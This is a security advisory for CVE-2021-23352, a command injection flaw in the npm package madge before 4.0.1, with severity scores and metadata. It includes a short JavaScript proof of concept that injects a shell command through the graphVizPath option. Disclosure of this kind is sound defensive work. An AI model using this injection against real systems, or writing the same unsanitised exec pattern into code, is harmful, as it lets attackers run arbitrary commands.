CVE-2021-23352 – madge

Package

Manager: npm
Name: madge
Vulnerable Version: >=0 <4.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00625 pctl0.69263

Details

Madge vulnerable to command injection This affects the package madge before 4.0.1. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which, when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function. ### PoC ```js const madge = require('madge'); madge('..', {graphVizPath: "touch HELLO;"}) .then((res) => res.svg()) .then((writtenImagePath) => { console.log('Image written to ' + writtenImagePath); }); ```

Metadata

Created: 2021-03-12T23:01:49Z
Modified: 2023-09-06T23:33:10Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-753c-phhg-cj29/GHSA-753c-phhg-cj29.json
CWE IDs: ["CWE-77", "CWE-89"]
Alternative ID: GHSA-753c-phhg-cj29
Finding: F422
Auto approve: 1